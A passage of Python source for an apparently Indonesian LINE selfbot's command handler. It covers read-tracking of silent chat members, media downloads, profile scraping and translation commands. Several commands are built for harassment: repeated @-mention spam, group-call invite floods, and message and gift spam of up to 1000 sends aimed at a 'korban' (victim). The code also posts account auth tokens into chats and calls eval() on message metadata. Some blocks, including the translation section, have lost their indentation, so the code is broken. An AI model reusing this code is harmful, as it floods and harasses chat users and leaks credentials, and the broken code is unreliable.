                G = ki.getGroup(msg.to)
                G.preventedJoinByTicket = True
                ki.updateGroup(G)
        elif cmd == "sprespon":
            # Time three representative API calls and report each elapsed
            # time divided by 3 as a rough responsiveness metric.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    get_profile_time_start = time.time()
                    get_profile = aditmadzs.getProfile()
                    get_profile_time = time.time() - get_profile_time_start
                    get_group_time_start = time.time()
                    get_group = aditmadzs.getGroupIdsJoined()
                    get_group_time = time.time() - get_group_time_start
                    get_contact_time_start = time.time()
                    get_contact = aditmadzs.getContact(mid)
                    get_contact_time = time.time() - get_contact_time_start
                    aditmadzs.sendMessage(msg.to, " ❧ BOT Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
        elif cmd == "speed" or cmd == "sp":
            # Measure the round-trip time of a single sendMessage call.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    start = time.time()
                    aditmadzs.sendMessage(msg.to, "Progres speed...")
                    elapsed_time = time.time() - start
                    aditmadzs.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
        elif cmd == "lurking on":
            # Start "lurking" (read-tracking) for this chat: remember the
            # message id as the read point and clear the reader map.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    tz = pytz.timezone("Asia/Jakarta")
                    timeNow = datetime.now(tz=tz)
                    Setmain['ADITMADZSreadPoint'][msg.to] = msg_id
                    Setmain['ADITMADZSreadMember'][msg.to] = {}
                    aditmadzs.sendMessage(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
        elif cmd == "lurking off":
            # Stop lurking: drop the read point and reader map for this chat.
            # NOTE(review): raises KeyError if lurking was never enabled here.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    tz = pytz.timezone("Asia/Jakarta")
                    timeNow = datetime.now(tz=tz)
                    del Setmain['ADITMADZSreadPoint'][msg.to]
                    del Setmain['ADITMADZSreadMember'][msg.to]
                    aditmadzs.sendMessage(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
        elif cmd == "lurkers":
            # Report who has read past the stored read point as an @-mention
            # list, then reset the read point to this message.
            if msg._from in admin:
                if msg.to in Setmain['ADITMADZSreadPoint']:
                    if Setmain['ADITMADZSreadMember'][msg.to] != {}:
                        nad = []
                        for x in Setmain['ADITMADZSreadMember'][msg.to]:
                            nad.append(x)
                        try:
                            arrData = ""
                            textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(nad)))
                            arr = []
                            no = 1
                            b = 1
                            # Build the MENTIONEES offsets: S/E are character
                            # positions of each "@x" placeholder in the text.
                            for i in nad:
                                b = b + 1
                                end = "\n"
                                mention = "@x\n"
                                slen = str(len(textx))
                                elen = str(len(textx) + len(mention) - 1)
                                arrData = {'S':slen, 'E':elen, 'M':i}
                                arr.append(arrData)
                                tz = pytz.timezone("Asia/Jakarta")
                                timeNow = datetime.now(tz=tz)
                                textx += mention
                                if no < len(nad):
                                    no += 1
                                    textx += str(b) + ". "
                                else:
                                    try:
                                        no = "[ {} ]".format(str(aditmadzs.getGroup(msg.to).name))
                                    except:
                                        no = " "
                            # NOTE(review): self-assignment, has no effect.
                            msg.to = msg.to
                            msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
                            msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
                            msg.contentType = 0
                            aditmadzs.sendMessage1(msg)
                        except:
                            pass
                        try:
                            del Setmain['ADITMADZSreadPoint'][msg.to]
                            del Setmain['ADITMADZSreadMember'][msg.to]
                        except:
                            pass
                        # Re-arm lurking from this message onwards.
                        Setmain['ADITMADZSreadPoint'][msg.to] = msg.id
                        Setmain['ADITMADZSreadMember'][msg.to] = {}
                    else:
                        aditmadzs.sendMessage(msg.to, "User kosong...")
                else:
                    aditmadzs.sendMessage(msg.to, "Ketik lurking on dulu")
        elif cmd == "sider on":
            # Enable the "sider" (silent reader) watcher for this chat.
            # The del/except dance clears any stale state first.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    try:
                        tz = pytz.timezone("Asia/Jakarta")
                        timeNow = datetime.now(tz=tz)
                        aditmadzs.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
                        del cctv['point'][msg.to]
                        del cctv['sidermem'][msg.to]
                        del cctv['cyduk'][msg.to]
                    except:
                        pass
                    cctv['point'][msg.to] = msg.id
                    cctv['sidermem'][msg.to] = ""
                    cctv['cyduk'][msg.to]=True
        elif cmd == "sider off":
            # Disable the sider watcher (flag only; state is kept).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.to in cctv['point']:
                        tz = pytz.timezone("Asia/Jakarta")
                        timeNow = datetime.now(tz=tz)
                        cctv['cyduk'][msg.to]=False
                        aditmadzs.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
                    else:
                        aditmadzs.sendMessage(msg.to, "Sudak tidak aktif")
        #===========Entertainment============#
        elif cmd.startswith("musik: "):
            # Search a Joox proxy API and send cover art, metadata, both audio
            # formats and the lyrics to the chat.
            if msg._from in admin:
                try:
                    search = msg.text.replace("musik: ","")
                    r = requests.get("https://farzain.xyz/api/premium/joox.php?apikey=al11241519&id={}".format(urllib.parse.quote(search)))
                    data = r.text
                    data = json.loads(data)
                    info = data["info"]
                    audio = data["audio"]
                    hasil = "「 Hasil Musik 」\n"
                    hasil += "\nPenyanyi : {}".format(str(info["penyanyi"]))
                    hasil += "\nJudul : {}".format(str(info["judul"]))
                    hasil += "\nAlbum : {}".format(str(info["album"]))
                    hasil += "\n\nLink : \n1. Image : {}".format(str(data["gambar"]))
                    hasil += "\n\nLink : \n2. MP3 : {}".format(str(audio["mp3"]))
                    hasil += "\n\nLink : \n3. M4A : {}".format(str(audio["m4a"]))
                    aditmadzs.sendImageWithURL(msg.to, str(data["gambar"]))
                    aditmadzs.sendMessage(msg.to, str(hasil))
                    aditmadzs.sendMessage(msg.to, "Downloading...")
                    aditmadzs.sendMessage(msg.to, "「 Result MP3 」")
                    aditmadzs.sendAudioWithURL(msg.to, str(audio["mp3"]))
                    aditmadzs.sendMessage(msg.to, "「 Result M4A 」")
                    aditmadzs.sendVideoWithURL(msg.to, str(audio["m4a"]))
                    aditmadzs.sendMessage(msg.to, str(data["lirik"]))
                    aditmadzs.sendMessage(msg.to, "Success Download...")
                except Exception as error:
                    aditmadzs.sendMessage(msg.to, "「 Result Error 」\n" + str(error))
        elif cmd.startswith("randomnumber: "):
            # Argument form "min-max": ask the API for a random number in range.
            if msg._from in admin:
                separate = msg.text.split(" ")
                angka = msg.text.replace(separate[0] + " ","")
                tgb = angka.split("-")
                num1 = tgb[0]
                num2 = tgb[1]
                r = requests.get("https://farzain.xyz/api/random.php?min="+num1+"&max="+num2)
                data = r.json()
                aditmadzs.sendMessage(msg.to,"Hasil : "+str(data["url"]))
        elif cmd.startswith("1cak"):
            # Fetch a random post from the 1cak meme API.
            if msg._from in admin:
                r=requests.get("https://api-1cak.herokuapp.com/random")
                data=r.text
                data=json.loads(data)
                print(data)
                hasil = "Result :\n"
                hasil += "\nID : " +str(data["id"])
                hasil += "\nTitle : " + str(data["title"])
                hasil += "\nUrl : " + str(data["url"])
                hasil += "\nVotes : " + str(data["votes"])
                aditmadzs.sendMessage(msg.to, str(hasil))
elif cmd.startswith("musik2: "):
if msg._from in admin:
try:
dan = msg.text.replace("musik2: ","")
r = requests.get("http://corrykalam.pw/api/joox.php?song={}"+urllib.parse.quote(dan))
data = r.json()
l = data["lyric"].replace("ti:","Judul: ")
i = l.replace("ar:","Penyanyi: ")
r = i.replace("al:","Album: ")
ii = r.replace("[by:]","")
k = ii.replace("[offset:0]","")
lirik = k.replace("***Lirik didapat dari pihak ketiga***\n","")
aditmadzs.sendImageWithURL(msg.to, data["image"])
t = "[ Music ]"
t += "\n\nJudul: "+str(data["title"])
t+="\nPenyanyi: "+str(data["singer"])
t+="\n\n[ Finish ]\n\n"+str(lirik)
aditmadzs.sendMessage(msg.to, str(t))
aditmadzs.sendAudioWithURL(msg.to, data["url"])
except Exception as error:
pass
        elif cmd.startswith("playlist "):
            # "playlist <query>" lists matching songs; "playlist <query>:<n>"
            # shows song n's details and sends its audio.
            if msg._from in admin:
                try:
                    sep = msg.text.split(" ")
                    query = msg.text.replace(sep[0] + " ","")
                    cond = query.split(":")
                    search = str(cond[0])
                    result = requests.get("http://api.ntcorp.us/joox/search?q={}".format(str(search)))
                    data = result.text
                    data = json.loads(data)
                    if len(cond) == 1:
                        num = 0
                        ret_ = "━━━━[ List Lagu ]━━━━"
                        for music in data["result"]:
                            num += 1
                            ret_ += "\n {}. {}".format(str(num), str(music["single"]))
                        ret_ += "\n ━━[ Total {} Lagu ]━━".format(str(len(data["result"])))
                        ret_ += "\n\nUntuk Melihat Details Musik, Silahkan Ketik \n❧「 {}Playlist {}:nomor 」 ".format(str(),str(search))
                        ret_ += "\n❧「 {}Lirik {}:nomor 」 ".format(str(),str(search))
                        aditmadzs.sendMessage(msg.to, str(ret_))
                    elif len(cond) == 2:
                        num = int(cond[1])
                        if num <= len(data["result"]):
                            music = data["result"][num - 1]
                            result = requests.get("http://api.ntcorp.us/joox/song_info?sid={}".format(str(music["sid"])))
                            data = result.text
                            data = json.loads(data)
                            if data["result"] != []:
                                ret_ = "┏━━━━[ Detail Musik ]━━━━"
                                ret_ += "\n┃┃ Title : {}".format(str(data["result"]["song"]))
                                ret_ += "\n┃┃ Album : {}".format(str(data["result"]["album"]))
                                ret_ += "\n┃┃ Size : {}".format(str(data["result"]["size"]))
                                ret_ += "\n┗━━[ Tunggu Audionya ]━━━"
                                aditmadzs.sendMessage(msg.to, str(ret_))
                                aditmadzs.sendAudioWithURL(msg.to, str(data["result"]["mp3"][0]))
                except Exception as error:
                    pass
        elif cmd.startswith("lirik "):
            # Same two-step pattern as "playlist" but returns the lyrics,
            # stripping LRC tags and timestamp digits from the text.
            if msg._from in admin:
                try:
                    sep = msg.text.split(" ")
                    query = msg.text.replace(sep[0] + " ","")
                    cond = query.split(":")
                    search = cond[0]
                    api = requests.get("http://api.secold.com/joox/cari/{}".format(str(search)))
                    data = api.text
                    data = json.loads(data)
                    if len(cond) == 1:
                        num = 0
                        ret_ = "━━━━[ List Lirik ]━━━━"
                        for lyric in data["results"]:
                            num += 1
                            ret_ += "\n {}. {}".format(str(num), str(lyric["single"]))
                        ret_ += "\n ━━[ Total {} Lagu ]━━".format(str(len(data["results"])))
                        ret_ += "\n\nUntuk Melihat Details Musik, Silahkan Ketik \n❧「 {}Lirik {}:nomor 」".format(str(),str(search))
                        ret_ += "\n❧「 {}Playlist {}:nomor 」 ".format(str(),str(search))
                        aditmadzs.sendMessage(msg.to, str(ret_))
                    elif len(cond) == 2:
                        num = int(cond[1])
                        if num <= len(data["results"]):
                            lyric = data["results"][num - 1]
                            api = requests.get("http://api.secold.com/joox/sid/{}".format(str(lyric["songid"])))
                            data = api.text
                            data = json.loads(data)
                            lyrics = data["results"]["lyric"]
                            lyric = lyrics.replace('ti:','Title - ')
                            lyric = lyric.replace('ar:','Artist - ')
                            lyric = lyric.replace('al:','Album - ')
                            # Remove every digit, dot and colon (LRC timestamps).
                            removeString = "[1234567890.:]"
                            for char in removeString:
                                lyric = lyric.replace(char,'')
                            aditmadzs.sendMessage(msg.to, str(lyric))
                except Exception as error:
                    pass
        elif cmd.startswith("img food: "):
            # Image-search for food pictures and send every result.
            if msg._from in admin:
                query = msg.text.replace("img food: ","")
                r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
                data=r.text
                data=json.loads(r.text)
                if data != []:
                    for food in data:
                        aditmadzs.sendImageWithURL(msg.to, str(food["url"]))
        elif cmd.startswith("profilesmule: "):
            # Send a screenshot of the given Smule profile page.
            if msg._from in admin:
                try:
                    separate = msg.text.split(" ")
                    smule = msg.text.replace(separate[0] + " ","")
                    links = ("https://smule.com/"+smule)
                    ss = ("http://api2.ntcorp.us/screenshot/shot?url={}".format(urllib.parse.quote(links)))
                    aditmadzs.sendMessage(msg.to, "Sedang Mencari...")
                    # Delay to give the screenshot service time to render.
                    time.sleep(2)
                    aditmadzs.sendMessage(msg.to, "ID Smule : "+smule+"\nLink : "+links)
                    aditmadzs.sendImageWithURL(msg.to, ss)
                except Exception as error:
                    pass
        elif cmd.startswith("meme"):
            # "meme@top@middle@bottom": build a memegen.link caption image.
            # NOTE(review): raises IndexError when fewer than three '@' parts
            # are supplied.
            if msg._from in admin:
                txt = msg.text.split("@")
                image = ("http://memegen.link/"+txt[1].replace(" ","_")+"/"+txt[2].replace(" ","_")+"/"+txt[3].replace(" ","_")+".jpg?watermark=none")
                aditmadzs.sendImageWithURL(msg.to, image)
        elif cmd.startswith("ytmp4: "):
            # Scrape YouTube search results, take the second hit, resolve the
            # best stream with pafy and send it as a video with metadata.
            if msg._from in admin:
                try:
                    sep = msg.text.split(" ")
                    textToSearch = msg.text.replace(sep[0] + " ","")
                    query = urllib.parse.quote(textToSearch)
                    search_url="https://www.youtube.com/results?search_query="
                    mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
                    sb_url = search_url + query
                    sb_get = requests.get(sb_url, headers = mozhdr)
                    soupeddata = BeautifulSoup(sb_get.content, "html.parser")
                    yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
                    x = (yt_links[1])
                    yt_href = x.get("href")
                    yt_href = yt_href.replace("watch?v=", "")
                    qx = "https://youtu.be" + str(yt_href)
                    vid = pafy.new(qx)
                    stream = vid.streams
                    best = vid.getbest()
                    best.resolution, best.extension
                    # NOTE(review): this loop just overwrites `me` each pass;
                    # only the final best.url is used.
                    for s in stream:
                        me = best.url
                    hasil = ""
                    title = "Judul [ " + vid.title + " ]"
                    author = '\n\n❧ Author : ' + str(vid.author)
                    durasi = '\n❧ Duration : ' + str(vid.duration)
                    suka = '\n❧ Likes : ' + str(vid.likes)
                    rating = '\n❧ Rating : ' + str(vid.rating)
                    deskripsi = '\n❧ Deskripsi : ' + str(vid.description)
                    aditmadzs.sendVideoWithURL(msg.to, me)
                    aditmadzs.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
                except Exception as e:
                    aditmadzs.sendMessage(msg.to,str(e))
        elif cmd.startswith("ytmp3: "):
            # Same scrape as ytmp4 but sends thumbnail + best audio stream.
            if msg._from in admin:
                try:
                    sep = msg.text.split(" ")
                    textToSearch = msg.text.replace(sep[0] + " ","")
                    query = urllib.parse.quote(textToSearch)
                    search_url="https://www.youtube.com/results?search_query="
                    mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
                    sb_url = search_url + query
                    sb_get = requests.get(sb_url, headers = mozhdr)
                    soupeddata = BeautifulSoup(sb_get.content, "html.parser")
                    yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
                    x = (yt_links[1])
                    yt_href = x.get("href")
                    yt_href = yt_href.replace("watch?v=", "")
                    qx = "https://youtu.be" + str(yt_href)
                    vid = pafy.new(qx)
                    stream = vid.streams
                    bestaudio = vid.getbestaudio()
                    bestaudio.bitrate
                    best = vid.getbest()
                    best.resolution, best.extension
                    # NOTE(review): loop only keeps the last iteration's urls.
                    for s in stream:
                        shi = bestaudio.url
                        me = best.url
                        vin = s.url
                    hasil = ""
                    title = "Judul [ " + vid.title + " ]"
                    author = '\n\n❧ Author : ' + str(vid.author)
                    durasi = '\n❧ Duration : ' + str(vid.duration)
                    suka = '\n❧ Likes : ' + str(vid.likes)
                    rating = '\n❧ Rating : ' + str(vid.rating)
                    deskripsi = '\n❧ Deskripsi : ' + str(vid.description)
                    aditmadzs.sendImageWithURL(msg.to, me)
                    aditmadzs.sendAudioWithURL(msg.to, shi)
                    aditmadzs.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
                except Exception as e:
                    aditmadzs.sendMessage(msg.to,str(e))
        elif cmd.startswith("profileig: "):
            # Scrape the public Instagram profile page's og: meta tags for
            # name, handle, follower/following/post counts and avatar.
            if msg._from in admin:
                try:
                    sep = msg.text.split(" ")
                    instagram = msg.text.replace(sep[0] + " ","")
                    html = requests.get('https://www.instagram.com/' + instagram + '/?')
                    soup = BeautifulSoup(html.text, 'html.parser')
                    data = soup.find_all('meta', attrs={'property':'og:description'})
                    text = data[0].get('content').split()
                    data1 = soup.find_all('meta', attrs={'property':'og:image'})
                    text1 = data1[0].get('content').split()
                    # Drop the thumbnail size segment to get the full avatar.
                    AR = text1[0].replace("s150x150/","")
                    user = "Name: " + text[-2] + "\n"
                    user1 = "Username: " + text[-1] + "\n"
                    followers = "Followers: " + text[0] + "\n"
                    following = "Following: " + text[2] + "\n"
                    post = "Post: " + text[4] + "\n"
                    link = "Link: " + "https://www.instagram.com/" + instagram
                    detail = "========INSTAGRAM INFO ========\n"
                    details = "\n========INSTAGRAM INFO ========"
                    aditmadzs.sendMessage(msg.to, detail + user + user1 + followers + following + post + link + details)
                    aditmadzs.sendImageWithURL(msg.to, AR)
                except Exception as njer:
                    aditmadzs.sendMessage(msg.to, str(njer))
        elif cmd.startswith("cekig:"):
            # Instagram profile via the farzain API.
            if msg._from in admin:
                try:
                    sep = text.split(" ")
                    search = text.replace(sep[0] + " ","")
                    r = requests.get("https://farzain.xyz/api/ig_profile.php?apikey=arTdnVbJkW1EuzDNQrIxQDvHARIDcQ&id={}".format(search))
                    data = r.text
                    data = json.loads(data)
                    if data != []:
                        ret_ = "┏━━[ Profile Instagram ]"
                        ret_ += "\n┃┃ Nama : {}".format(str(data["info"]["full_name"]))
                        ret_ += "\n┃┃ Username : {}".format(str(data["info"]["username"]))
                        ret_ += "\n┃┃ Bio : {}".format(str(data["info"]["bio"]))
                        ret_ += "\n┃┃ URL Bio : {}".format(str(data["info"]["url_bio"]))
                        ret_ += "\n┃┃ Pengikut : {}".format(str(data["count"]["followers"]))
                        # NOTE(review): "Diikuti" (following) reuses the
                        # "followers" count — probably meant a "following"
                        # field; verify against the API's response schema.
                        ret_ += "\n┃┃ Diikuti : {}".format(str(data["count"]["followers"]))
                        ret_ += "\n┃┃ Total Post : {}".format(str(data["count"]["post"]))
                        ret_ += "\n┗━━[ https://www.instagram.com/{} ]".format(search)
                        path = data["info"]["profile_pict"]
                        aditmadzs.sendMessage(to, str(ret_))
                        aditmadzs.sendImageWithURL(to, str(path))
                except Exception as e:
                    aditmadzs.sendMessage(msg.to, str(e))
        elif cmd.startswith("cekdate: "):
            # Birth-date lookup: age, next birthday and zodiac sign.
            if msg._from in admin:
                sep = msg.text.split(" ")
                tanggal = msg.text.replace(sep[0] + " ","")
                r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91ARs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
                data=r.text
                data=json.loads(data)
                lahir = data["data"]["lahir"]
                usia = data["data"]["usia"]
                ultah = data["data"]["ultah"]
                zodiak = data["data"]["zodiak"]
                aditmadzs.sendMessage(msg.to,"🐚 I N F O R M A S I 🐚\n\n"+"🐚 Date Of Birth : "+lahir+"\n🐚 Age : "+usia+"\n🐚 Ultah : "+ultah+"\n🐚 Zodiak : "+zodiak)
        elif cmd.startswith("spamtag: "):
            # Set how many times "spamtag" repeats the mention.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    proses = text.split(":")
                    strnum = text.replace(proses[0] + ":","")
                    num = int(strnum)
                    Setmain["ADITMADZSlimit"] = num
                    aditmadzs.sendMessage(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
        elif cmd.startswith("spamcall: "):
            # Set how many times "spamcall" repeats the group-call invite.
            if wait["selfbot"] == True:
                if msg._from in admin:
                    proses = text.split(":")
                    strnum = text.replace(proses[0] + ":","")
                    num = int(strnum)
                    wait["limit"] = num
                    aditmadzs.sendMessage(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
        elif cmd.startswith("spamtag "):
            # Repeatedly @-mention the first mentioned user, up to the
            # configured ADITMADZSlimit (hard cap 1000).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    # NOTE(review): chained comparison — this evaluates as
                    # ('MENTION' in keys) and (keys != None); the "!=None"
                    # part is redundant but harmless.
                    if 'MENTION' in msg.contentMetadata.keys()!=None:
                        # SECURITY(review): eval() on message metadata.
                        key = eval(msg.contentMetadata["MENTION"])
                        key1 = key["MENTIONEES"][0]["M"]
                        zx = ""
                        zxc = " "
                        zx2 = []
                        pesan2 = "@a"" "
                        xlen = str(len(zxc))
                        xlen2 = str(len(zxc)+len(pesan2)-1)
                        zx = {'S':xlen, 'E':xlen2, 'M':key1}
                        zx2.append(zx)
                        zxc += pesan2
                        msg.contentType = 0
                        msg.text = zxc
                        lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
                        msg.contentMetadata = lol
                        jmlh = int(Setmain["ADITMADZSlimit"])
                        if jmlh <= 1000:
                            for x in range(jmlh):
                                try:
                                    aditmadzs.sendMessage1(msg)
                                except Exception as e:
                                    aditmadzs.sendMessage(msg.to,str(e))
                        else:
                            aditmadzs.sendMessage(msg.to,"Jumlah melebihi 1000")
        elif cmd == "spamcall":
            # Repeatedly invite all group members to a group call, up to the
            # configured wait["limit"] (hard cap 1000).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    if msg.toType == 2:
                        group = aditmadzs.getGroup(to)
                        members = [mem.mid for mem in group.members]
                        jmlh = int(wait["limit"])
                        aditmadzs.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
                        if jmlh <= 1000:
                            for x in range(jmlh):
                                try:
                                    call.acquireGroupCallRoute(to)
                                    call.inviteIntoGroupCall(to, contactIds=members)
                                except Exception as e:
                                    aditmadzs.sendMessage(msg.to,str(e))
                        else:
                            aditmadzs.sendMessage(msg.to,"Jumlah melebihi batas")
        elif 'Gift: ' in msg.text:
            # "Gift: <mid> <count>": send a theme gift <count> times from
            # both bots to the target mid (cap 1000).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    korban = msg.text.replace('Gift: ','')
                    korban2 = korban.split()
                    midd = korban2[0]
                    jumlah = int(korban2[1])
                    if jumlah <= 1000:
                        for var in range(0,jumlah):
                            aditmadzs.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}, contentType=9)
                            ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
        elif 'Spam: ' in msg.text:
            # "Spam: <mid> <count>": send the stored spam message <count>
            # times from both bots (cap 1000).
            if wait["selfbot"] == True:
                if msg._from in admin:
                    korban = msg.text.replace('Spam: ','')
                    korban2 = korban.split()
                    midd = korban2[0]
                    jumlah = int(korban2[1])
                    if jumlah <= 1000:
                        for var in range(0,jumlah):
                            aditmadzs.sendMessage(midd, str(Setmain["ADITMADZSmessage1"]))
                            ki.sendMessage(midd, str(Setmain["ADITMADZSmessage1"]))
        elif 'Mybottoken' in msg.text:
            # Creator-only: dump both accounts' auth tokens into the chat.
            # SECURITY(review): tokens grant full account access — sending
            # them into a chat is inherently dangerous.
            if wait["selfbot"] == True:
                if msg._from in creator:
                    aditmadzs.sendMessage(msg.to,"Aditmadzs\n"+aditmadzs.authToken)
                    aditmadzs.sendMessage(msg.to,"KI\n"+ki.authToken)
#==============================================================================#
elif msg.text.lower().startswith("tr-af "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='af')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sq "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sq')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-am "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='am')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ar "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-az "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='az')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-eu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='eu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-be "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='be')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bs "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bs')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ca "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ca')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ceb "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ceb')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ny "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ny')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-cn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-cn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-tw "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-tw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-co "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='co')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hr "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hr')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-cs "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='cs')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-da "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='da')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-nl "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
